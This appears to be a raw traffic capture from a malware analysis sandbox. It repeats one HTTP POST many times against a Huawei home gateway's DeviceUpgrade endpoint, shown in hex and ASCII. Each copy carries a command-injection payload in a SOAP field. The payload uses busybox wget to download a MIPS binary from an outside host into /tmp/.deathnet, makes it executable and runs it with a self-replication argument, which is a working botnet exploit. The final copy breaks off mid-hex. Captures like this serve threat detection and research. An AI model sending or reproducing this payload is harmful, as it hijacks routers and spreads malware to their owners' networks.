43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 